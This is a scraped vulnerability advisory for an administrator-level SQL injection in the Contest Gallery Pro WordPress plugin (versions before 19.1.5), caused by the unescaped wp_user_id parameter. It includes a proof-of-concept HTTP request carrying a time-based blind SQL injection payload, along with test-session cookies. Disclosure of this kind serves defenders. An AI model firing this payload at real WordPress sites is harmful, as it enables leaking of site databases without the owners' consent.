Lucene search

K
wpvulndbKunal SharmaWPVDB-ID:DAC32ED4-D3DF-420A-A2EB-9E7D2435826A
HistoryDec 05, 2022 - 12:00 a.m.

Contest Gallery Pro < 19.1.5 - Admin+ SQL Injection

2022-12-0500:00:00
Kunal Sharma
wpscan.com
42
contest gallery pro
sql injection
unescaped parameter
administrator privileges
sensitive information leakage

EPSS

0.001

Percentile

36.8%

The plugin does not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with at administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users;_management=true&option;_id=1&edit;_registration_entries=1&wp;_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513 Content-Length: 355 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------15540990533670320912247141513 Content-Disposition: form-data; name=“action” post_contest_gallery_action_ajax -----------------------------15540990533670320912247141513 Content-Disposition: form-data; name=“cgBackendHash” e12e8782da8ac6c4f1725d81a9811524 -----------------------------15540990533670320912247141513–

EPSS

0.001

Percentile

36.8%

Related for WPVDB-ID:DAC32ED4-D3DF-420A-A2EB-9E7D2435826A